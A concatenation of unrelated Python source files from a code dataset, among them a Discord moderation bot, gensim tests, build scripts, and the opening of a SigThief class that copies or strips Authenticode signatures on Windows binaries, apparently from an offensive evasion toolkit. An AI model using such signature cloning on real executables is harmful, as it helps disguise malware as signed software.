await ctx.send("Bannissement de l'utilisateur impossible. Vous n'avez pas les permissions nécessaires.")
await ctx.message.delete()
#Il s'en sort avec un simple avertissement, chanceux...
@sigma.command()
@commands.has_permissions(ban_members=True)
async def unban(ctx, user, *reason):
reason = " ".join(reason)
userName, userId = user.split("#")
bannedUsers = await ctx.guild.bans()
for i in bannedUsers:
if i.user.name == userName and i.user.discriminator == userId:
await ctx.guild.unban(i.user, reason=reason)
await ctx.send(f"{user} à été unban.")
return
await ctx.send(f"L'utilisateur {user} n'est pas dans la liste des bans")
#CHEH TU RESTES BAN ( •̀ ω •́ )ψ
@unban.error
async def unban_error(ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send("Débannissement de l'utilisateur impossible. Vous n'avez pas les permissions nécessaires.")
await ctx.message.delete()
#Exclusion... ça finit souvent dans le bureau du principal..
@sigma.command()
@commands.has_permissions(kick_members=True)
async def kick(ctx, user: discord.User, *reason):
reason = " ".join(reason)
await ctx.guild.kick(user, reason=reason)
await ctx.send(f"{user} à été kick pour la raison suivante: {reason}")
await ctx.message.delete()
#Ou pas :D
@kick.error
async def kick_error(ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send("Exclusion de l'utilisateur impossible. Vous n'avez pas les permissions nécessaires.")
await ctx.message.delete()
#Effacer toutes les preuves d'un crime >:D
@sigma.command(pass_context=True, aliases=['purge', 'clean', 'delete'])
@commands.has_permissions(manage_messages=True)
async def clear(ctx, limit: int):
await ctx.channel.purge(limit=limit + 1)
#Sauf si on est nul :(
@clear.error
async def clear_error(ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send("Nettoyage des messages impossible. Vous n'avez pas les permissions nécessaires.")
await ctx.message.delete()
@sigma.command()
@commands.has_permissions(manage_roles=True)
async def createMutedRole(ctx):
mutedRole = await ctx.guild.create_role(name="Muted",
permissions=discord.Permissions(send_messages=False, speak=False),
reason="Creation du role Muted pour mute des gens.")
for channel in ctx.guild.channels:
await channel.set_permissions(mutedRole, send_messages=False, speak=False)
return mutedRole
async def getMutedRole(ctx):
roles = ctx.guild.roles
for role in roles:
if role.name == "Muted":
return role
return await createMutedRole(ctx)
@sigma.command()
@commands.has_permissions(manage_messages=True)
async def mute(ctx, member: discord.Member, *, reason="Aucune raison n'a été renseignée"):
mutedRole = await getMutedRole(ctx)
await member.add_roles(mutedRole, reason=reason)
await ctx.send(f"{member.mention} a été mute !")
await ctx.message.delete()
@mute.error
async def mute_error(ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send("Mute de l'utilisateur impossible. Vous n'avez pas les permissions nécessaires.")
await ctx.message.delete()
@sigma.command()
@commands.has_permissions(manage_messages=True)
async def unmute(ctx, member: discord.Member, *, reason="Aucune raison n'a été renseignée"):
mutedRole = await getMutedRole(ctx)
await member.remove_roles(mutedRole, reason=reason)
await ctx.send(f"{member.mention} a été unmute !")
await ctx.message.delete()
@unmute.error
async def unmute_error(ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send("Unmute de l'utilisateur impossible. Vous n'avez pas les permissions nécessaires.")
await ctx.message.delete()
@sigma.command()
@commands.has_permissions(manage_messages=True)
async def modo(ctx):
embed = discord.Embed(title="Les différentes commandes de modération du bot sigma :",
description="`*ban @utilisateur raison` Banni l'utilisateur mentionné. \n`*unban utilisateur#XXXX` Dé-banni l'utilisateur tagué.\n`*clear X` Supprime X messages. \n`*kick @utilisateur raison` Exclu l'utilisateur mentionné. \n`*mute @utilisateur raison` Rend muet l'utilisateur mentionné. \n`*unmute @utilisateur raison` Rend la parole à l'utilisateur mentionné. \n `*say #salon message` Envoie le message demandé dans le salon demandé.\n`*modo` affiche cette page.\n`*mp @utilisateur message` Envoie le message demandé à l'utilisateur mentionné. \n`*vote` permet de faire voter les membres. \n`.annonce` Envoi d'une annonce dans le channel __*<En cours>*__ \n***Aministrateurs seulement.***",
color=0x2F3136)
await ctx.send(embed=embed)
await ctx.message.delete()
@modo.error
async def modo_error(ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send("Usage de la commande impossible. Vous n'avez pas les permissions nécessaires.")
await ctx.message.delete()
@sigma.command(aliases=['dm'])
@commands.has_permissions(administrator=True)
async def mp(ctx, user: discord.User, *, value):
await user.send(f"{value}")
@mp.error
async def mp_error(ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send("Usage de la commande impossible. Vous n'avez pas les permissions nécessaires.")
await ctx.message.delete()
@sigma.command()
async def ping(ctx):
await ctx.send('Pong! {0}'.format(round(sigma.latency, 1)))
await ctx.message.delete()
@sigma.command()
async def pipo(ctx):
await ctx.send("https://cdn.discordapp.com/attachments/788764210443059200/790987611442905130/inconnu.gif")
await ctx.message.delete()
@sigma.command()
async def serverinfo(ctx):
name = str(ctx.guild.name)
description = str("SIGMΛ est un serveur Discord communautaire avec comme but principal la discussion et le partage.")
id = str(ctx.guild.id)
memberCount = str(ctx.guild.member_count)
icon = str(ctx.guild.icon_url)
embed = discord.Embed(
title="SIGMΛ",
description=description,
color=0x2F3136
)
embed.set_thumbnail(url=icon)
embed.add_field(name="Fondateur", value="<@490834874022756363>", inline=True)
embed.add_field(name="ID", value=id, inline=True)
embed.add_field(name="Région", value="Europe", inline=True)
embed.add_field(name="Nombre de membres", value=memberCount, inline=True)
await ctx.send(embed=embed)
await ctx.message.delete()
@sigma.command()
async def suggest(ctx, *, description):
': Suggest a command. Provide the command name and description'
embed = discord.Embed(title='Nouvelle suggestion', description=f'Suggéré par: {ctx.author.mention}', color=discord.Color.blurple())
embed.add_field(name='Description', value=description)
channel = ctx.guild.get_channel(845124536893440030)
msg = await channel.send(embed=embed)
await msg.add_reaction('👍')
await msg.add_reaction('👎')
await ctx.message.delete()
@sigma.command()
@commands.has_permissions(administrator=True)
async def vote(ctx, *, description):
'Commande vote'
embed = discord.Embed(title='C\'est l\'heure de voter !', description=f'Vote par: {ctx.author.mention}', color=discord.Color.green())
embed.add_field(name='Description', value=description)
channel = ctx.guild.get_channel(845124536893440030)
msg = await channel.send(embed=embed)
await msg.add_reaction('✔')
await msg.add_reaction('❌')
await ctx.message.delete()
@sigma.command()
async def vote(ctx, *, description):
'Commande report'
embed = discord.Embed(title='Nouveau report !', description=f'Report éfféctué par: {ctx.author.mention}', color=discord.Color.red())
embed.add_field(name='Description', value=description)
channel = ctx.guild.get_channel(845124536893440030)
msg = await channel.send(embed=embed)
await msg.add_reaction('✔')
await msg.add_reaction('❌')
await ctx.message.delete()
@sigma.command()
@commands.has_permissions(administrator=True)
async def annonce(ctx, *, description):
'Commande annnonce'
embed = discord.Embed(title='Annonce !', description=f'Annonce éfféctuée par: {ctx.author.mention}', color=discord.Color.blurple())
embed.add_field(name='Description', value=description)
channel = ctx.guild.get_channel(845124536893440030)
msg = await channel.send(embed=embed)
await msg.add_reaction('✔')
await ctx.send(f"@everyone")
await ctx.message.delete()
sigma.run(token)
| StarcoderdataPython |
94059 | <reponame>arnoyu-hub/COMP0016miemie<filename>venv/Lib/site-packages/gensim/test/test_similarity_metrics.py
#!/usr/bin/env python
# encoding: utf-8
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Automated test to check similarity functions and isbow function.
"""
import logging
import unittest
from gensim import matutils
from scipy.sparse import csr_matrix
import numpy as np
import math
from gensim.corpora.mmcorpus import MmCorpus
from gensim.models import ldamodel
from gensim.test.utils import datapath, common_dictionary, common_corpus
class TestIsBow(unittest.TestCase):
def test_None(self):
# test None
result = matutils.isbow(None)
expected = False
self.assertEqual(expected, result)
def test_bow(self):
# test list words
# one bag of words
potentialbow = [(0, 0.4)]
result = matutils.isbow(potentialbow)
expected = True
self.assertEqual(expected, result)
# multiple bags
potentialbow = [(0, 4.), (1, 2.), (2, 5.), (3, 8.)]
result = matutils.isbow(potentialbow)
expected = True
self.assertEqual(expected, result)
# checking empty input
potentialbow = []
result = matutils.isbow(potentialbow)
expected = True
self.assertEqual(expected, result)
# checking corpus; should return false
potentialbow = [[(2, 1), (3, 1), (4, 1), (5, 1), (1, 1), (7, 1)]]
result = matutils.isbow(potentialbow)
expected = False
self.assertEqual(expected, result)
# not a bag of words, should return false
potentialbow = [(1, 3, 6)]
result = matutils.isbow(potentialbow)
expected = False
self.assertEqual(expected, result)
# checking sparse matrix format bag of words
potentialbow = csr_matrix([[1, 0.4], [0, 0.3], [2, 0.1]])
result = matutils.isbow(potentialbow)
expected = True
self.assertEqual(expected, result)
# checking np array format bag of words
potentialbow = np.array([[1, 0.4], [0, 0.2], [2, 0.2]])
result = matutils.isbow(potentialbow)
expected = True
self.assertEqual(expected, result)
class TestHellinger(unittest.TestCase):
def setUp(self):
self.corpus = MmCorpus(datapath('testcorpus.mm'))
self.class_ = ldamodel.LdaModel
self.model = self.class_(common_corpus, id2word=common_dictionary, num_topics=2, passes=100)
def test_inputs(self):
# checking empty inputs
vec_1 = []
vec_2 = []
result = matutils.hellinger(vec_1, vec_2)
expected = 0.0
self.assertEqual(expected, result)
# checking np array and list input
vec_1 = np.array([])
vec_2 = []
result = matutils.hellinger(vec_1, vec_2)
expected = 0.0
self.assertEqual(expected, result)
# checking scipy csr matrix and list input
vec_1 = csr_matrix([])
vec_2 = []
result = matutils.hellinger(vec_1, vec_2)
expected = 0.0
self.assertEqual(expected, result)
def test_distributions(self):
# checking different length bag of words as inputs
vec_1 = [(2, 0.1), (3, 0.4), (4, 0.1), (5, 0.1), (1, 0.1), (7, 0.2)]
vec_2 = [(1, 0.1), (3, 0.8), (4, 0.1)]
result = matutils.hellinger(vec_1, vec_2)
expected = 0.484060507634
self.assertAlmostEqual(expected, result)
# checking symmetrical bag of words inputs return same distance
vec_1 = [(2, 0.1), (3, 0.4), (4, 0.1), (5, 0.1), (1, 0.1), (7, 0.2)]
vec_2 = [(1, 0.1), (3, 0.8), (4, 0.1), (8, 0.1), (10, 0.8), (9, 0.1)]
result = matutils.hellinger(vec_1, vec_2)
result_symmetric = matutils.hellinger(vec_2, vec_1)
expected = 0.856921568786
self.assertAlmostEqual(expected, result)
self.assertAlmostEqual(expected, result_symmetric)
# checking ndarray, csr_matrix as inputs
vec_1 = np.array([[1, 0.3], [0, 0.4], [2, 0.3]])
vec_2 = csr_matrix([[1, 0.4], [0, 0.2], [2, 0.2]])
result = matutils.hellinger(vec_1, vec_2)
expected = 0.160618030536
self.assertAlmostEqual(expected, result)
# checking ndarray, list as inputs
vec_1 = np.array([0.6, 0.1, 0.1, 0.2])
vec_2 = [0.2, 0.2, 0.1, 0.5]
result = matutils.hellinger(vec_1, vec_2)
expected = 0.309742984153
self.assertAlmostEqual(expected, result)
# testing LDA distribution vectors
np.random.seed(0)
model = self.class_(self.corpus, id2word=common_dictionary, num_topics=2, passes=100)
lda_vec1 = model[[(1, 2), (2, 3)]]
lda_vec2 = model[[(2, 2), (1, 3)]]
result = matutils.hellinger(lda_vec1, lda_vec2)
expected = 1.0406845281146034e-06
self.assertAlmostEqual(expected, result)
class TestKL(unittest.TestCase):
def setUp(self):
self.corpus = MmCorpus(datapath('testcorpus.mm'))
self.class_ = ldamodel.LdaModel
self.model = self.class_(common_corpus, id2word=common_dictionary, num_topics=2, passes=100)
def test_inputs(self):
# checking empty inputs
vec_1 = []
vec_2 = []
result = matutils.kullback_leibler(vec_1, vec_2)
expected = 0.0
self.assertEqual(expected, result)
# checking np array and list input
vec_1 = np.array([])
vec_2 = []
result = matutils.kullback_leibler(vec_1, vec_2)
expected = 0.0
self.assertEqual(expected, result)
# checking scipy csr matrix and list input
vec_1 = csr_matrix([])
vec_2 = []
result = matutils.kullback_leibler(vec_1, vec_2)
expected = 0.0
self.assertEqual(expected, result)
def test_distributions(self):
# checking bag of words as inputs
vec_1 = [(2, 0.1), (3, 0.4), (4, 0.1), (5, 0.1), (1, 0.1), (7, 0.2)]
vec_2 = [(1, 0.1), (3, 0.8), (4, 0.1)]
result = matutils.kullback_leibler(vec_2, vec_1, 8)
expected = 0.55451775
self.assertAlmostEqual(expected, result, places=5)
# KL is not symetric; vec1 compared with vec2 will contain log of zeros and return infinity
vec_1 = [(2, 0.1), (3, 0.4), (4, 0.1), (5, 0.1), (1, 0.1), (7, 0.2)]
vec_2 = [(1, 0.1), (3, 0.8), (4, 0.1)]
result = matutils.kullback_leibler(vec_1, vec_2, 8)
self.assertTrue(math.isinf(result))
# checking ndarray, csr_matrix as inputs
vec_1 = np.array([[1, 0.3], [0, 0.4], [2, 0.3]])
vec_2 = csr_matrix([[1, 0.4], [0, 0.2], [2, 0.2]])
result = matutils.kullback_leibler(vec_1, vec_2, 3)
expected = 0.0894502
self.assertAlmostEqual(expected, result, places=5)
# checking ndarray, list as inputs
vec_1 = np.array([0.6, 0.1, 0.1, 0.2])
vec_2 = [0.2, 0.2, 0.1, 0.5]
result = matutils.kullback_leibler(vec_1, vec_2)
expected = 0.40659450877
self.assertAlmostEqual(expected, result, places=5)
# testing LDA distribution vectors
np.random.seed(0)
model = self.class_(self.corpus, id2word=common_dictionary, num_topics=2, passes=100)
lda_vec1 = model[[(1, 2), (2, 3)]]
lda_vec2 = model[[(2, 2), (1, 3)]]
result = matutils.kullback_leibler(lda_vec1, lda_vec2)
expected = 4.283407e-12
self.assertAlmostEqual(expected, result, places=5)
class TestJaccard(unittest.TestCase):
def test_inputs(self):
# all empty inputs will give a divide by zero exception
vec_1 = []
vec_2 = []
self.assertRaises(ZeroDivisionError, matutils.jaccard, vec_1, vec_2)
def test_distributions(self):
# checking bag of words as inputs
vec_1 = [(2, 1), (3, 4), (4, 1), (5, 1), (1, 1), (7, 2)]
vec_2 = [(1, 1), (3, 8), (4, 1)]
result = matutils.jaccard(vec_2, vec_1)
expected = 1 - 0.3
self.assertAlmostEqual(expected, result)
# checking ndarray, csr_matrix as inputs
vec_1 = np.array([[1, 3], [0, 4], [2, 3]])
vec_2 = csr_matrix([[1, 4], [0, 2], [2, 2]])
result = matutils.jaccard(vec_1, vec_2)
expected = 1 - 0.388888888889
self.assertAlmostEqual(expected, result)
# checking ndarray, list as inputs
vec_1 = np.array([6, 1, 2, 3])
vec_2 = [4, 3, 2, 5]
result = matutils.jaccard(vec_1, vec_2)
expected = 1 - 0.333333333333
self.assertAlmostEqual(expected, result)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.DEBUG)
unittest.main()
| StarcoderdataPython |
3226588 | <filename>xmonitor/async/flows/introspect.py<gh_stars>0
# Copyright 2015 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
from oslo_concurrency import processutils as putils
from oslo_utils import encodeutils
from oslo_utils import excutils
from taskflow.patterns import linear_flow as lf
from xmonitor.async import utils
from xmonitor.i18n import _LE
LOG = logging.getLogger(__name__)
class _Introspect(utils.OptionalTask):
"""Taskflow to pull the embedded metadata out of image file"""
def __init__(self, task_id, task_type, image_repo):
self.task_id = task_id
self.task_type = task_type
self.image_repo = image_repo
super(_Introspect, self).__init__(
name='%s-Introspect-%s' % (task_type, task_id))
def execute(self, image_id, file_path):
"""Does the actual introspection
:param image_id: Glance image ID
:param file_path: Path to the file being introspected
"""
try:
stdout, stderr = putils.trycmd('qemu-img', 'info',
'--output=json', file_path,
log_errors=putils.LOG_ALL_ERRORS)
except OSError as exc:
# NOTE(flaper87): errno == 2 means the executable file
# was not found. For now, log an error and move forward
# until we have a better way to enable/disable optional
# tasks.
if exc.errno != 2:
with excutils.save_and_reraise_exception():
exc_message = encodeutils.exception_to_unicode(exc)
msg = (_LE('Failed to execute introspection '
'%(task_id)s: %(exc)s') %
{'task_id': self.task_id, 'exc': exc_message})
LOG.error(msg)
return
if stderr:
raise RuntimeError(stderr)
metadata = json.loads(stdout)
new_image = self.image_repo.get(image_id)
new_image.virtual_size = metadata.get('virtual-size', 0)
new_image.disk_format = metadata.get('format')
self.image_repo.save(new_image)
LOG.debug("%(task_id)s: Introspection successful: %(file)s",
{'task_id': self.task_id, 'file': file_path})
return new_image
def get_flow(**kwargs):
"""Return task flow for introspecting images to obtain metadata about the
image.
:param task_id: Task ID
:param task_type: Type of the task.
:param image_repo: Image repository used.
"""
task_id = kwargs.get('task_id')
task_type = kwargs.get('task_type')
image_repo = kwargs.get('image_repo')
LOG.debug("Flow: %(task_type)s with ID %(id)s on %(repo)s",
{'task_type': task_type, 'id': task_id, 'repo': image_repo})
return lf.Flow(task_type).add(
_Introspect(task_id, task_type, image_repo),
)
| StarcoderdataPython |
125433 | <gh_stars>1-10
"""Tests for Microsoft Visual C++ Compiler"""
def tests_compiler():
"""Test Compiler"""
import platform
from compilertools.compilers._core import _get_arch_and_cpu
from compilertools.compilers.msvc import Compiler
version = ""
def dummy_compiler():
"""platform.python_compiler"""
return version
platform_python_compiler = platform.python_compiler
platform.python_compiler = dummy_compiler
try:
compiler = Compiler(current_compiler=True)
# Check not existing version
assert compiler.version == 0.0
# Check existing version
version = "MSC v.1800 64 bit"
del compiler["version"]
assert compiler.version == 12.0
# Check 13.0 skipped
version = "MSC v.1900 64 bit"
del compiler["version"]
assert compiler.version == 14.0
# Not current compiler
assert Compiler().version == 0.0
finally:
platform.python_compiler = platform_python_compiler
# Test API/Options
assert len(compiler.api) > 0
assert len(compiler.option) > 0
# Test _compile_args_matrix
arch, cpu = _get_arch_and_cpu("x86_32")
assert compiler._compile_args_matrix(arch, cpu)
| StarcoderdataPython |
3264508 | <reponame>ratt-ru/pfb-clean
import numpy as np
class Dirac(object):
def __init__(self, nband, nx, ny, mask=None):
"""
Models image as a sum of Dirac deltas i.e.
x = H beta
where H is a design matrix that maps the Dirac coefficients onto the image cube.
Parameters
----------
nband - number of bands
nx - number of pixels in x-dimension
ny - number of pixels in y-dimension
mask - nx x my bool array containing locations of sources
"""
self.nx = nx
self.ny = ny
self.nband = nband
if mask is not None:
self.mask = mask
else:
self.mask = lambda x: x
def dot(self, x):
"""
Components to image
"""
return self.mask[None, :, :] * x
def hdot(self, x):
"""
Image to components
"""
return self.mask[None, :, :] * x
def update_locs(self, model):
if model.ndim == 3:
self.mask = np.logical_or(self.mask, np.any(model, axis=0))
elif model.ndim == 2:
self.mask = np.logical_or(self.mask, model != 0)
else:
raise ValueError("Incorrect number of model dimensions")
def trim_fat(self, model):
if model.ndim == 3:
self.mask = np.any(model, axis=0)
elif model.ndim == 2:
self.mask = model != 0
else:
raise ValueError("Incorrect number of model dimensions")
| StarcoderdataPython |
1616420 |
import sys
import pprint
def get_positions(fh):
positions = []
for line in fh:
line = line.strip()
if len(line) == 0:
continue
elif len(positions) == 0:
positions = list(map(int,line.split(',')))
return positions
if __name__ == "__main__":
pp = pprint.PrettyPrinter(compact=True)
positions = get_positions(sys.stdin)
optimal_position = -1
cost = -1
for c in range(min(positions), max(positions)+1):
p = sum(list(map(lambda x: abs(x - c), positions)))
if cost == -1 or p < cost:
cost = p
optimal_position = c
print(f'Optimal position = {optimal_position}')
print(f'Cost = {cost}')
| StarcoderdataPython |
4815529 | """Generic CSV file read and write operations."""
import csv
import os
FMT = dict(lineterminator="\n", quoting=csv.QUOTE_MINIMAL)
def check(enc):
if enc not in ['utf-8', 'windows-1251']:
raise ValueError("Encoding not supported: " + str(enc))
def yield_rows(path, enc='windows-1251', sep=";"):
"""Emit CSV rows by filename."""
with open(path, 'r', encoding=enc) as csvfile:
spamreader = csv.reader(csvfile, delimiter=sep)
for row in spamreader:
yield row
def _open(path):
return open(path, 'w', encoding="utf-8")
#@print_elapsed_time
def save_rows(path, stream, column_names=None):
with _open(path) as file:
writer = csv.writer(file, **FMT)
if column_names:
writer.writerow(column_names)
writer.writerows(stream)
#@print_elapsed_time
def save_dicts(path, dict_stream, column_names):
if os.path.exists(path):
raise Exception("%s already exists" % path)
with _open(path) as file:
writer = csv.DictWriter(file, fieldnames=column_names, **FMT)
for d in dict_stream:
writer.writerow(d)
| StarcoderdataPython |
1778744 | <reponame>DBrianKimmel/PyHouse_Install
"""
@name: PyHouse_Install/src/Install/Utility.py
@author: <NAME>
@contact: <EMAIL>
@copyright: (c) 2015-2016 by <NAME>
@license: MIT License
@note: Created on Oct 13, 2015
@Summary:
"""
# Import system type stuff
import getpass
import os
import subprocess
try:
import pwd
except ImportError:
import Install.test.win_pwd as pwd
class Utilities(object):
"""
"""
@staticmethod
def must_not_be_root():
l_user = getpass.getuser()
if l_user == 'root':
exit('You must not be root (no sudo)! - Aborting!')
@staticmethod
def get_user_ids(p_user_name):
l_user = pwd.getpwnam(p_user_name)
l_uid = l_user.pw_uid
l_gid = l_user.pw_gid
return l_uid, l_gid
@staticmethod
def is_dir(p_path):
return os.path.isdir(p_path)
@staticmethod
def MakeDir(p_dir_name, p_user_name):
l_uid, l_gid = Utilities.get_user_ids(p_user_name)
if not os.path.isdir(p_dir_name):
print(' Creating a directory {}'.format(p_dir_name))
subprocess.call(['sudo', 'mkdir', p_dir_name])
subprocess.call(['sudo', 'chown', str(l_uid), str(p_dir_name)])
subprocess.call(['sudo', 'chgrp', str(l_gid), str(p_dir_name)])
else:
print(' *** Directory {} already exists.'.format(p_dir_name))
def getserial():
# Extract serial from cpuinfo file
cpuserial = "0000000000000000"
try:
f = open('/proc/cpuinfo', 'r')
for line in f:
if line[0:6] == 'Serial':
cpuserial = line[10:26]
f.close()
except:
cpuserial = "ERROR000000000"
return cpuserial
# ## END DBK
| StarcoderdataPython |
131914 | <reponame>caburu/rl-baselines3-zoo<filename>julio/safe_evaluate_policy.py<gh_stars>0
from stable_baselines3.common.vec_env import VecEnv, DummyVecEnv
import numpy as np
# O método `evaluate_policy` original da biblioteca chama `reset` duas vezes por
# episódio se o ambiente passado usar DummyVecEnv (através da VecNormalize, por exemplo).
# Isso me causou problemas ao fazer comparações com baselines.
#
# O método abaixo altera o `evaluate_policy` original garantindo apenas uma chamada
# ao método `reset` por episódio e garantindo a mesma sequência de chamadas independentemente
# o ambiente ser o original ou de usar o DummyVecEnv.
#
# MAS *** ainda tem uma chamada adicional do reset ao final.
# - Assim chamadas sucessivas do método não garantem funcionamento correto.
# - Comparações só são válidas se forem para uma única chamada ao método.
#
# Obs: eu abri uma Issue sobre isso na biblioteca:
# https://github.com/hill-a/stable-baselines/issues/906
def safe_evaluate_policy(model, env, n_eval_episodes=10, deterministic=True,
render=False, callback=None, reward_threshold=None,
return_episode_rewards=False):
"""
Runs policy for ``n_eval_episodes`` episodes and returns average reward.
This is made to work only with one env.
:param model: (BaseAlgorithm) The RL agent you want to evaluate.
:param env: (gym.Env or VecEnv) The gym environment. In the case of a ``VecEnv``
this must contain only one environment.
:param n_eval_episodes: (int) Number of episode to evaluate the agent
:param deterministic: (bool) Whether to use deterministic or stochastic actions
:param render: (bool) Whether to render the environment or not
:param callback: (callable) callback function to do additional checks,
called after each step.
:param reward_threshold: (float) Minimum expected reward per episode,
this will raise an error if the performance is not met
:param return_episode_rewards: (bool) If True, a list of reward per episode
will be returned instead of the mean.
:return: (float, float) Mean reward per episode, std of reward per episode
returns ([float], [int]) when ``return_episode_rewards`` is True
"""
if isinstance(env, VecEnv):
assert env.num_envs == 1, "You must pass only one environment when using this function"
wrap_action = False
else:
env = DummyVecEnv([lambda:env])
wrap_action = True
episode_rewards, episode_lengths = [], []
demands_by_epis = []
obs = env.reset()
demands_by_epis.append(env.envs[0].customer_demands.copy())
num_episodes = 0
while num_episodes < n_eval_episodes:
done, state = False, None
episode_reward = 0.0
episode_length = 0
while not done:
action, state = model.predict(obs, state=state, deterministic=deterministic)
if wrap_action: action = [action]
obs, reward, done, _info = env.step(action)
episode_reward += reward
if callback is not None:
callback(locals(), globals())
episode_length += 1
if render:
env.render()
num_episodes += 1
episode_rewards.append(episode_reward)
episode_lengths.append(episode_length)
if num_episodes < n_eval_episodes:
demands_by_epis.append(env.envs[0].customer_demands.copy())
mean_reward = np.mean(episode_rewards)
std_reward = np.std(episode_rewards)
if reward_threshold is not None:
assert mean_reward > reward_threshold, ('Mean reward below threshold: '
f'{mean_reward:.2f} < {reward_threshold:.2f}')
if return_episode_rewards:
return episode_rewards, episode_lengths, demands_by_epis
return mean_reward, std_reward
| StarcoderdataPython |
3239699 | """Build script for Lyve-SET Conda package"""
import os
import subprocess as sp
# Make rules to run
BASE_MAKE_RULES = [
'install-mkdir',
'install-SGELK',
'install-CGP',
'install-perlModules',
'install-config'
]
EXPENSIVE_MAKE_RULES = ['install-phast']
# Relative directory in conda env to install to
# Just put everything in a subdirectory of opt
INSTALL_DIR = 'opt/lyve-set'
# Files to install in conda ENV from working directory
INSTALL_FILES = [
'scripts',
'lib',
'plugins',
'docs',
'README.md',
'LICENSE',
]
def log(message, *args, **kwargs):
"""Write line to stdout with recognizable prefix.
:param str message: Message to write
:param \\**args: Positional arguments to format message with.
:param \\**kwargs: Keyword arguments to format message with.
"""
print('\n@@', message.format(*args, **kwargs), '\n')
def cmd(*args, **export):
"""Run a command in a subprocess.
Prints command before executing.
:param \\*args: Command and its arguments.
:param \\**export: Environment variables to export.
"""
# Print the command
msg = '$'
if export is not None:
for k, v in export.items():
msg += ' {}="{}"'.format(k, v)
for arg in args:
msg += ' ' + arg
log(msg)
# Environment variables
env = None
if export is not None:
env = dict(os.environ)
env.update(export)
# Run
p = sp.Popen(args, env=env)
rcode = p.wait()
# Check exit code
if rcode:
raise RuntimeError(
'Process returned non-zero exit code: {}'
.format(rcode)
)
def make_symlink_relative(path):
"""Replace a symbolic link with a relative one.
:param str path: Path to symbolic link.
"""
assert os.path.islink(path)
target = os.readlink(path)
# Skip if already relative
if not os.path.isabs(target):
return
rel = os.path.relpath(target, os.path.dirname(path))
os.unlink(path)
os.symlink(rel, path)
def build(work_dir, prefix, dirty=False):
"""Run the build process.
:param str work_dir: Working directory containing the repo's source code.
:param str prefix: Path to install to (should already exist).
:param bool dirty: Whether the build process has already been run in this
directory.
"""
log('Beginning build process')
os.chdir(work_dir)
# Makefile rules to run
make_rules = BASE_MAKE_RULES[:]
if dirty:
log(
'--dirty is set, skipping the following make rules: {}',
' '.join(EXPENSIVE_MAKE_RULES),
)
else:
make_rules += EXPENSIVE_MAKE_RULES
# Run Makefile
log('Running Makefile...')
cmd('make', *make_rules)
# Run "check" rule to check dependencies
log('Checking dependencies...')
cmd('make', 'check')
# Convert absolute symlink paths to relative paths
log('Fixing symlinks...')
for fname in os.listdir('scripts'):
fpath = os.path.join('scripts', fname)
if os.path.islink(fpath):
make_symlink_relative(fpath)
# Directory to install to
install_dir = os.path.join(prefix, INSTALL_DIR)
log('Installing to {}', install_dir)
cmd('mkdir', '-p', install_dir)
# Copy files
log('Copying files...')
for file in INSTALL_FILES:
cmd(
'cp',
'-r',
os.path.join(work_dir, file),
os.path.join(install_dir, file),
)
# Install wrapper script
script_src = os.path.join(work_dir, 'wrapper.sh')
script_dst = os.path.join(prefix, 'bin', 'lyve-set')
cmd('cp', script_src, script_dst)
cmd('chmod', '+x', script_dst)
# Done
log('Install script completed successfully')
if __name__ == '__main__':
if os.environ.get('CONDA_BUILD') != '1':
raise RuntimeError('CONDA_BUILD environment variable not set')
dirty = os.environ.get('DIRTY', '') == '1'
build(os.getcwd(), os.environ['PREFIX'], dirty=dirty)
| StarcoderdataPython |
3223028 | <reponame>pwnmeow/inceptor<filename>inceptor/signers/SigThief.py
#!/usr/bin/env python3
# LICENSE: BSD-3
# Copyright: <NAME> @midnite_runr
# Adapted by klezVirus @klezVirus
import argparse
import os.path
import sys
import struct
import shutil
import io
import tempfile
from pathlib import Path
from config.Config import Config
from utils.console import Console
class SigThief:
ACTIONS = ["save", "add", "del", "check", "clone"]
def __init__(self, action, certificate_file=None):
self.config = Config()
self.debug = self.config.get_boolean("DEBUG", "signers")
self.action = action
self.certificate_file = certificate_file
self.certificate = None
if not certificate_file:
self.certificate_file = tempfile.NamedTemporaryFile(
dir=str(self.config.get_path("DIRECTORIES", "certificates")),
suffix=".cer",
delete=True
).name
elif certificate_file and action == "add":
self.certificate = open(self.certificate_file, "rb").read()
self.target_info = {}
@property
def suffix(self):
if self.action in ["add", "clone"]:
return "_signed"
elif self.action in ["save"]:
return "_sig"
elif self.action in ["del"]:
return "_nosig"
def clean(self):
if self.action != "save":
path = Path(self.certificate_file)
path.unlink(missing_ok=True)
def __gather_file_info_win(self, file):
"""
Borrowed from BDF...
I could just skip to certLOC... *shrug*
"""
if self.debug:
Console.auto_line(f"[*] Gathering binary information: '{file}'")
self.target_info = {}
with open(file, 'rb') as binary:
binary.seek(int('3C', 16))
self.target_info['buffer'] = 0
self.target_info['JMPtoCodeAddress'] = 0
self.target_info['dis_frm_pehdrs_sectble'] = 248
self.target_info['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
# Start of COFF
self.target_info['COFF_Start'] = self.target_info['pe_header_location'] + 4
binary.seek(self.target_info['COFF_Start'])
self.target_info['MachineType'] = struct.unpack('<H', binary.read(2))[0]
binary.seek(self.target_info['COFF_Start'] + 2, 0)
self.target_info['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
self.target_info['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
binary.seek(self.target_info['COFF_Start'] + 16, 0)
self.target_info['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
self.target_info['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
# End of COFF
self.target_info['OptionalHeader_start'] = self.target_info['COFF_Start'] + 20
# if self.target_info['SizeOfOptionalHeader']:
